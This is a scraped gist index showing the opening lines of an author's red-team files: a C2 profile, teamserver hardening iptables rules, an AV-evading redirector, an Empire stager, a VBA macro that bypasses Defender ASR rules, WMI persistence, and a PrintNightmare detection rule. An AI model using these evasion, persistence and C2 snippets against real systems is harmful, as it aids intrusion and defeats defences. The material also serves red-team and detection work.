This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# PlugX Profile | |
# Author: @infosecn1nja | |
# | |
# https://github.com/silence-is-best/c2db/blob/master/README.md | |
set sleeptime "30000"; # use a ~30s delay between callbacks | |
set jitter "10"; # throw in a 10% jitter | |
stage { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
- PrinterNightmare CVE-2021-34527 Exploit Detection | |
- Created by Rahmat Nurfauzi (@infosecn1nja). | |
- This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2. | |
--> | |
<group name="sysmon,"> | |
<rule id="99948" level="15"> | |
<if_group>sysmon_event_11</if_group> | |
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field> | |
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import argparse | |
import re, random | |
import string, os, os.path | |
def rand_num(min, max): | |
return random.randrange(min, max) | |
def gen_str(size): | |
return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Make a rule that allows port 80/443 access only from redirector: | |
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 443 -j DROP | |
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 80 -j DROP | |
Change default port teamserver : | |
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
APT Group/Red Team Weaponization Phase | |
======================================= | |
C2 tools : | |
- Cobalt Strike | |
- Empire | |
- PoshC2 | |
- PupyRAT | |
- Metasploit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine On | |
# Uncomment the below line for verbose logging, including seeing which rule matched. | |
#LogLevel alert rewrite:trace5 | |
# BURN AV BURN | |
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
RewriteCond expr "-R '52.0.0.0/8'" [OR] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'wmic_xsl_starfighters', | |
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime) | |
# https://wikileaks.org/ciav7p1/cms/page_14587908.html | |
<# | |
.SYNOPSIS | |
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once. | |
#> | |
$EventFilterName = "Fileless WMI Persistence SystemUptime" |
NewerOlder